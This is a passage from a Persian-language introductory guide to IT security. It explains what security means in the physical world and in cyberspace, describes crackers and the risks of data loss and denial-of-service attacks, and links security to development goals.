our Lives, Harvard Business School Press
(1997).
Millennium Development Goals
۲۳
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﻳﻜﻲ ﺍﺯ ﺳﻪ ﻣﻮﺿـﻮﻉ ﺍﺻـﻠﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ
ﺍﺟﻼﺱ ﺳﺮﺍﻥ ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻛﻨﻔﺮﺍﻧﺲ ﺧـﻮﺩ ﺩﺭ ﺟﻨـﻮﺍ )ﺩﺳـﺎﻣﺒﺮ
(۲۰۰۳ﺭﻭﻱ ﺁﻥ ﻛﺎﺭ ﻛﺮﺩ ﻭ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺎﺯ ﻫﻢ ﺩﺭ ﺗﻮﻧﺲ )ﺁﻭﺭﻳـﻞ (۲۰۰۵
ﺭﻭﻱ ﺁﻥ ﻛﺎﺭ ﺷﻮﺩ .ﺍﻳﻦ ﻳﻚ ﺩﻟﻴﻞ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻳﻦ ﻭﺍﻗﻌﻴـﺖ ﺍﺳـﺖ ﻛـﻪ
ﻧﻘﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺭ ﺗﻮﺳـﻌﻪ ﺑﺘـﺪﺭﻳﺞ ﺑـﻪ ﺟﺎﻳﮕـﺎﻩ
ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﻧﺰﺩﻳﻜﺘﺮ ﻣﻲﺷﻮﺩ.
ﺍﻳﻦ ﻛﺘﺎﺏ ﻭ ﻫﺮ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺷﻤﺎ ﺭﺍ ﺍﺯ
ﻛﺴﺐ ﺩﺍﻧﺴﺘﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺩﺭﺑﺎﺭﺓ ﺭﺍﻳﺎﻧﻪ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺍﻓـﺰﺍﻳﺶ
ﺳﻄﺢ ﺁﮔﺎﻫﻲ ﻭ ﻣﻬﺎﺭﺗﻬﺎﻳﺘﺎﻥ ﺑﻲ ﻧﻴﺎﺯ ﻧﻤﻲ ﻛﻨﺪ .ﺍﻣـﺮﻭﺯﻩ ﺍﻳﻨﺘﺮﻧـﺖ
ﺩﺭﻭﺍﺯﺓ ﻭﺭﻭﺩ ﺑﻪ ﺩﻧﻴﺎﻱ ﺷﮕﻔﺖ ﺍﻧﮕﻴﺰ ﺍﻃﻼﻋﺎﺕ ﻭ ﺩﺍﻧﺴﺘﻪﻫﺎ ﺍﺳﺖ
ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑـﺎ ﻗﻴﻤـﺖ ﺑـﺴﻴﺎﺭ ﻧـﺎﺯﻝ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ
ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻣﻲ ﺗـﻮﺍﻥ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﺼﻮﺭﺕ
ﻛﺎﺭﺁﻣﺪ ﻭ ﻣﺆﺛﺮﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺭﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ
ﺍﻳﻦ ﻫﺪﻑ ﻻﺯﻡ ﺍﺳﺖ ﺍﻣﻜﺎﻧﺎﺕ ﻭ ﺭﻓﺘﺎﺭﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ
ﻣﻘﺎﺑﻞ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ .ﺑﺎ ﻣﻔﻬﻮﻡ ﻫﻮﺷﻴﺎﺭﻱ ﺩﺭ
ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺁﺷﻨﺎ ﻫﺴﺘﻴﻢ .ﺍﻛﻨﻮﻥ ﺑﺎﻳـﺪ ﺑﻴـﺎﻣﻮﺯﻳﻢ ﻛـﻪ ﭼﮕﻮﻧـﻪ
ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻪ ﻫﻮﺷﻴﺎﺭﻱ )ﻫﻮﺷﻴﺎﺭﻱ ﺳـﺎﻳﺒﺮ( ﺭﺳـﻴﺪ.
ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷـﻤﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻣﻬـﻢ ﺗﻬﻴـﻪ ﻭ
ﺗﺪﻭﻳﻦ ﺷﺪﻩ ﺍﺳﺖ.
ﺍﻣﻨﻴﺖ ﭼﻴﺴﺖ؟
21
22
ﻣﻔﻬﻮﻡ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺎ ﺣﻴﺎﺗﻲ ﺍﺳﺖ.
ﺩﺭ ﺩﻭﺭﺍﻥ ﻣﺎﻗﺒﻞ ﺗﺎﺭﻳﺦ ،ﺍﻣﻨﻴﺖ ﻋﺒﺎﺭﺕ ﺑﻮﺩ ﺍﺯ ﺍﺻﻮﻝ ﺣﻔـﻆ ﺑﻘـﺎ؛
ﻧﻈﻴﺮ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻠﺔ ﺩﻳﮕﺮﺍﻥ ﻳﺎ ﺣﻴﻮﺍﻧـﺎﺕ ،ﻭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ
ﺗﺄﻣﻴﻦ ﻏﺬﺍ.
Crackers
24
ﺑﺨﺶ ﺍﻭﻝ
ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻫﻤﻮﺍﺭﻩ ﻣﺨﺎﻃﺮﺍﺗﻲ ﺟﺪﻱ ﻣﺎﻧﻨـﺪ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ
ﺳﻮﺍﺑﻖ ،ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ،ﺧـﺮﺍﺏ ﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺧﺼﻤﺎﻧﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺗﻤﺎﻡ ﻳـﺎ
ﺑﺨﺸﻲ ﺍﺯ ﺳﻮﺍﺑﻖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺷﺮﻛﺖ ﺭﺍ ﺯﻣﻴﻨﮕﻴـﺮ
ﻛﻨﺪ .ﺑﺮﺍﻱ ﻛﺸﻮﺭﻱ ﻛﻪ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺁﻥ ﺿـﻌﻴﻒ
ﺍﺳﺖ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻨـﺎﺑﻊ ﺣﻴـﺎﺗﻲ ﺁﻥ ﺩﺭ ﻣﻌـﺮﺽ
ﺧﻄﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺑﻪ ﺁﻧﻬﺎ ﺻﺪﻣﺎﺕ ﺟﺒﺮﺍﻥ ﻧﺎﭘـﺬﻳﺮﻱ ﻭﺍﺭﺩ ﺷـﻮﺩ.
ﻋﺪﻡ ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺭﻭﺍﺑـﻂ
ﺧﺎﺭﺟﻲ ﺩﺭ ﺻﻨﺎﻳﻊ ﺧﻮﺩ ﺍﻫﻤﻴـﺖ ﻣـﻲﺩﻫﻨـﺪ ﻣـﻲﺗﻮﺍﻧـﺪ ﻣﻮﺟـﺐ
ﺧﺴﺎﺭﺗﻬﺎﻱ ﺟﺪﻱ ﻭ ﭘﻴﺶ ﺑﻴﻨﻲ ﻧﺸﺪﻩ ﺍﻱ ﮔﺮﺩﺩ .ﻧﻴﻞ ﺑـﻪ ﺍﻫـﺪﺍﻑ
ﺗﻮﺳﻌﺔ ﻫﺰﺍﺭﻩ ) ٢٢(MDGﺑﻪ ﺗﻮﺍﻧﺎﻳﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ
ﺍﺳﺘﻔﺎﺩﺓ ﻣﺆﺛﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺑﻮﺩﺟـﺔ ﺁﻧﻬـﺎ ﺑـﺎ
٢٣
ﻋﻀﻮﻳﺖ ﺩﺍﺋﻤﻲ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺗﺠـﺎﺭﺕ ﺟﻬـﺎﻧﻲ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ.
ﺗﻮﺍﻧﺎﻳﻲ ﻛﺴﺐ ﻭ ﺗﺄﻣﻴﻦ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺎﺳﺐ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺗﻤـﺎﻣﻲ
ﺯﻣﻴﻨﻪﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻛﻤﻚ ﻛﻨﺪ.
ﺳﻴــﺴﺘﻤﻬﺎ ﻭﺍﺭﺩ ﺷــﻮﻧﺪ ﻭ ﻣــﺸﻜﻼﺗﻲ ﺑﻮﺟــﻮﺩ ﺑﻴﺎﻭﺭﻧــﺪ .ﺑﻴــﺸﺘﺮ
ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﺯ ﺟﺎﻧﺐ ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ٢٤ﻧﺎﺷـﻲ
ﻣﻲﺷﻮﺩ .ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ﺍﻓﺮﺍﺩﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺛﺎﺑـﺖ ﻛﻨﻨـﺪ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻫﺮ ﺳﺪ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺳﺮ ﺭﺍﻫﺸﺎﻥ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ
ﻋﺒﻮﺭ ﻛﻨﻨﺪ .ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﻢ ﭼﻨـﻴﻦ ﺭﻓﺘـﺎﺭﻱ ﺭﺍ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ
ﻣﺪﻝ ﻛﻨﻴﻢ ﺑﺎﻳﺪ ﻓﺮﺩﻱ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﺩﻫـﻴﻢ ﻛـﻪ ﻣـﻲﺧﻮﺍﻫـﺪ
ﺛﺎﺑﺖ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺧﺎﻧﻪ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﺪﻭﻥ ﺩﺳﺖ
ﺯﺩﻥ ﺑﻪ ﭼﻴﺰﻱ ﺧﺎﺭﺝ ﺷﻮﺩ! ﭼﻨﻴﻦ ﭘﺪﻳﺪﻩﺍﻱ ﻧﻪﺗﻨﻬﺎ ﻣﻮﺟﺐ ﺑـﺮﻭﺯ
ﻧﻮﻋﻲ ﺍﺣﺴﺎﺱ ﻋﺪﻡ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺷﻮﺩ ،ﺑﻠﻜﻪ ﺍﻳﻦ ﺳـﺆﺍﻝ ﺭﺍ ﻧﻴـﺰ
ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﺩ ﻛﻪ ﭼﻪ ﭼﻴﺰﻱ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻦ ﻳـﺎ ﻛـﻢ ﺷـﺪﻥ
ﺍﺳﺖ ﻳـﺎ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ
ﻧﻔﻮﺫﻫﺎﻱ ﺑﻌﺪﻱ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ .ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﭼﻨـﻴﻦ ﺭﻓﺘـﺎﺭﻱ ﺩﺭ
ﺩﻧﻴــﺎﻱ ﻭﺍﻗﻌــﻲ ﻗﺎﺑــﻞ ﺗﺤﻤــﻞ ﻧﻴــﺴﺖ ،ﺩﺭ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﻫــﻢ
ﻧﻤﻲﺗﻮﺍﻥ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺭﺍ ﺗﺤﻤﻞ ﻛﺮﺩ .ﻓﻨﻮﻥ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ ﻛﺘـﺎﺏ
ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺧﻮﺩﺗـﺎﻥ ﺩﺭ ﻣﻘﺎﺑـﻞ ﭼﻨـﻴﻦ ﺭﻓﺘﺎﺭﻫـﺎﻳﻲ
ﻛﻤﻚ ﺧﻮﺍﻫﺪ ﻧﻤﻮﺩ.
٣٢
ﻧﻴﺎﺯﻫﺎﻱ ﺩﻳﮕﺮ ﭼﻮﻥ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻮﺍﺩﺙ ﻃﺒﻴﻌﻲ ﻳﺎ ﺑﻴﻤﺎﺭﻳﻬﺎ
ﻋﻤﻮﻣﹰﺎ ﺑﺮﺍﻱ ﺍﻧﺴﺎﻧﻬﺎﻱ ﻣﺎﻗﺒﻞ ﺗﺎﺭﻳﺦ ﻣﻄﺮﺡ ﻧﺒـﻮﺩ .ﺑـﺎ ﭘﻴـﺸﺮﻓﺖ
ﺗﻤﺪﻥ ،ﻣﺤﺪﻭﺩﺓ ﺍﻣﻨﻴﺖ ﻓﺮﺍﺗﺮ ﺭﻓﺘﻪ ﻭ ﺍﺑﻌـﺎﺩ ﻭﺳـﻴﻌﺘﺮﻱ ﻣﺎﻧﻨـﺪ ﺩﺭ
ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻣﻜﺎﻧﻲ ﺑﺮﺍﻱ ﺁﺳﺎﻳﺶ ﻭ ﺯﻧﺪﮔﻲ ﺑﻲﺧﻄـﺮ ﺭﺍ ﺩﺭ ﺑـﺮ
ﮔﺮﻓﺖ ﻭ ﺍﻣﺮﻭﺯﻩ ﻣﻔﻬﻮﻡ ﺍﻣﻮﺍﻝ ﺷﺨﺼﻲ ﻧﻴﺰ ﺑـﻪ ﺗﻌﺮﻳـﻒ ﺍﻣﻨﻴـﺖ
ﺍﺿﺎﻓﻪ ﺷﺪﻩ ﺍﺳﺖ.
ﺑﻴﺸﺘﺮ ﺁﻧﭽﻪ ﻛﻪ ﻣﺎ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﻢ ﺑﺎ ﻣﺨـﺎﻃﺮﻩ
ﻫﻤﺮﺍﻩ ﺍﺳﺖ؛ ﻫﺮﭼﻨﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻤﺎﻥ ﻣﺨﺎﻃﺮﺓ ﻛﻤﻲ ﺩﺭ
ﻼ ﻭﻗﺘﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺷﺨﺼﻲ ﻧﺎﺁﺷﻨﺎ ﺑﻪ ﺳﻔﺮ ﻣﻲﺭﻭﻳـﻢ
ﭘﻲ ﺩﺍﺭﺩ .ﻣﺜ ﹰ
ﻭ ﻳﺎ ﺑﻪ ﺷﻬﺮ ﻳﺎ ﻛﺸﻮﺭﻱ ﻧﺎﺁﺷﻨﺎ ﻭﺍﺭﺩ ﻣﻲﺷـﻮﻳﻢ ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ ﺭﺍ
ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺟـﺴﻤﻲﻣـﺎﻥ ﺗﻬﺪﻳـﺪﺍﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻃﺮﺍﻑ ﻣﺎ ﻭﻗﺘﻲ ﺟﺪﻱ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻛـﻪ ﻣـﺎ
ﺩﺭ ﻣﻜﺎﻧﻲ ﺣﻔﺎﻇﺖﻧﺸﺪﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﻢ ﻭ ﺑﺎ ﻓـﺮﺩﻱ ﺭﻭﺑـﺮﻭ ﺷـﻮﻳﻢ
ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﻣﻮﻗﻌﻴﺖ ﻣﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﺍﮔﺮ ﺑﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ
ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻃﺮﺍﻑ ﺧـﻮﺩ ﺗﻮﺟـﻪ ﻛﻨـﻴﻢ ﻣﻮﻓـﻖ ﺧـﻮﺍﻫﻴﻢ ﺷـﺪ
ﻼ ﻫﻤﺮﺍﻩ ﻛـﺴﻲ
ﻣﻜﺎﻧﻲ ﺍﻣﻦ ﭘﻴﺪﺍ ﻛﻨﻴﻢ ﻳﺎ ﺭﺍﻩ ﭼﺎﺭﻩﺍﻱ ﺑﻴﺎﺑﻴﻢ؛ ﻣﺜ ﹰ
ﺷﻮﻳﻢ ﻛﻪ ﻣﺎ ﺭﺍ ﺑﻪ ﻣﻜﺎﻥ ﺍﻣﻨﻲ ﻫﺪﺍﻳﺖ ﻛﻨـﺪ ،ﻳـﺎ ﻳـﻚ ﺗﺎﻛـﺴﻲ
ﺑﮕﻴﺮﻳﻢ.
ﺑﻌﻀﻲ ﺍﺯ ﻛﺎﺭﻫﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺭﻭﺍﻧﺸﻨﺎﺧﺘﻲ ﻳﺎ ﻣﺎﻟﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧـﺪ
ﻭﻟﻲ ﻣﺨﺎﻃﺮﺓ ﺟﺴﻤﻲ ﻧﺪﺍﺭﻧﺪ .ﻭﻗﺘﻲ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻲﻛﻨـﻴﻢ )ﺩﺭ
ﻫﺮﻳﻚ ﺍﺯ ﺍﺷﻜﺎﻝ ﺧﺮﻳﺪ ﺯﻣﻴﻦ ،ﺳﻬﺎﻡ ﻳﺎ ﺣﺘﻲ ﻓﻌﺎﻟﻴﺖ ﺩﺭ ﺗﺠﺎﺭﺕ ﻭ ﻳﺎ ﻛـﺎﺭ ﺩﺭ
ﺑﺎﺯﺍﺭ( ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻳﻢ ﻛﻪ ﺍﻳﻦ ﺳﺮﻣﺎﻳﻪ ﻫﺮﭼﻪ ﺯﻭﺩﺗﺮ ﺑﻪ ﻣـﺎ ﺑـﺎﺯﮔﺮﺩﺩ.
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﻲﺩﺍﻧﻴﻢ ﺑﻌـﻀﻲ ﺍﺯ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎ ﺩﻳـﺮ ﻳـﺎ ﺯﻭﺩ
ﺑﺎﺯﺧﻮﺍﻫﻨﺪ ﮔﺸﺖ؛ ﺣﺎﻝ ﺁﻧﻜﻪ ﺑﻌﻀﻲ ﺍﺯ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎ ﺍﻳﻨﮕﻮﻧـﻪ
ﻼ ﻭﻗﺘﻲ
ﻧﻴﺴﺘﻨﺪ ﻭ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻫﻢ ﺑﻪ ﺯﻳﺎﻥ ﻣﻨﺠﺮ ﻣﻲﺷﻮﻧﺪ .ﻣﺜ ﹰ
ﺑﺎ ﺷﺨﺺ ﺟﺪﻳﺪﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻴﻢ ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﻛـﻪ ﺍﻳـﻦ
ﺭﺍﺑﻄﺔ ﺟﺪﻳﺪ ﺑﺮﺍﻳﻤﺎﻥ ﺁﻭﺭﺩﻩﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻫﺮﭼﻨـﺪ ﺧﻄـﺮ ﺍﻳـﻦ
ﻣﺴﺌﻠﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻳـﻦ ﺭﺍﺑﻄـﻪ ﺍﺯ ﻓﺎﻳـﺪﺓ ﻻﺯﻡ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﻧﺒﺎﺷﺪ ﺭﺍ ﻧﻴﺰ ﻣﻲﭘﺬﻳﺮﻳﻢ.
ﺩﺭ ﺑﻌﻀﻲ ﺯﻣﻴﻨﻪﻫﺎ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ
ﻼ ﻫﻤﻴـﺸﻪ ﻣـﺎﻳﻠﻴﻢ ﻋﻤـﺮﻱ ﻃـﻮﻻﻧﻲ ﻭ
ﺩﺍﺭﻳﻢ ﻣﻤﻜﻦ ﻧﻴﺴﺖ .ﻣﺜ ﹰ
ﺟﺴﻤﻲ ﺳﺎﻟﻢ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ؛ ﻭﻟﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﻣﻌـﺪﻝ ﺁﻣـﺎﺭﻱ
ﻃﻮﻝ ﻋﻤﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻧﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑـﺮﺍﻱ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺻﺪﻕ ﻧﻤﻲﻛﻨﺪ .ﺑﻌﻀﻲ ﺍﺯ ﻣـﺎ ﺩﺭ ﺳـﻨﻴﻦ ﭘـﺎﺋﻴﻦ
ﻣﻲﻣﻴﺮﻳﻢ ،ﺗﻌﺪﺍﺩﻱ ﺩﺭ ﻃﻮﻝ ﺣﻴﺎﺕ ﺑﺎ ﺑﻴﻤﺎﺭﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺳـﺖ
ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﻣﻲﻛﻨﻴﻢ ،ﻭ ﺑﺮﺧﻲ ﺗﺎ ﺳﺎﻟﻴﺎﻥ ﺩﺭﺍﺯ ﺯﻧﺪﻩ ﻣﻲﻣـﺎﻧﻴﻢ ﻭ
ﻋﻤﺮﻱ ﺑﻪ ﺳﻼﻣﺖ ﺭﻭﺯﮔﺎﺭ ﻣﻲﮔﺬﺭﺍﻧﻴﻢ .ﻋـﺪﻡ ﺗﻮﺍﻧـﺎﻳﻲ ﺧـﻮﺩ ﺩﺭ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺗﻌﻴﻴﻦ ﺳﺮﻧﻮﺷﺖ ﺭﺍ ﺑﺎ ﺑﻴﻤﻪ ﺟﺒﺮﺍﻥ ﻣﻲﻛﻨـﻴﻢ ﺗـﺎ ﻣـﺎ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ
ﺍﺛﺮﺍﺕ ﻣﻨﻔﻲ ﻣﺎﻟﻲ ،ﺣﻮﺍﺩﺙ ﻭ ﺑﻴﻤﺎﺭﻳﻬﺎ ﺣﻔﺎﻇﺖ ﻛﻨﺪ.
ﺍﻳﻦ ﻣﻘﺪﻣﻪ ﺣﻘﻴﻘﺘﻲ ﺭﺍ ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﭘﻴﺶ ﺭﻭﻱ ﻣﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ:
ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﭼﻪ ﺩﺭ ﺯﻧـﺪﮔﻲ ﻭﺍﻗﻌـﻲ ﻭ ﭼـﻪ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ
ﻏﻴﺮﻣﻤﻜﻦ ﻭ ﻣﺤﺎﻝ ﺍﺳﺖ؛ ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ
ﻛــﺎﻓﻲ ﻣﻨﺎﺳــﺐ ﺑﺎﺷــﺪ ﺗﻘﺮﻳﺒــﹰﺎ ﺩﺭ ﺗﻤــﺎﻣﻲ ﺷــﺮﺍﻳﻂ ﻣﺤﻴﻄــﻲ
ﺩﺳﺖﻳﺎﻓﺘﻨﻲ ﻣﻲﺑﺎﺷﺪ.
ﻲ
ﺭﺍﻫﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﮔﺮﻓﺘﻦ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﻘـﻮﻳﺘ ﹺ
ﺍﻓﺰﺍﻳﺶ ﻭ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻣﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﻓﻴﺰﻳﻜـﻲ
ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻴﻢ :ﺳﺎﺧﺘﻤﺎﻧﻬﺎﻱ ﺑﻠﻨﺪ ﻭ
ﻣﺴﺘﺤﻜﻢ ﻭ ﺩﺭﻫﺎﻱ ﻣﺤﻜـﻢ ﻭ ﻧﻔﻮﺫﻧﺎﭘـﺬﻳﺮ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﻗﻔﻠﻬـﺎ ﻭ
ﻛﻠﻴﺪﻫﺎﻱ ﺑﻲﺷﻤﺎﺭ .ﻣﺎ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺑﻪ ﻣﺮﺯﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺩﻳﮕﺮ ﻣﺜﻞ
ﺩﻳﻮﺍﺭﻫﺎ ﻭ ﺩﻳﮕـﺮ ﻣﻮﺍﻧـﻊ ﺟﺪﺍﺳـﺎﺯ ﻧﻴـﺰ ﺗﻜﻴـﻪ ﻛﻨـﻴﻢ .ﻫﻤﭽﻨـﻴﻦ
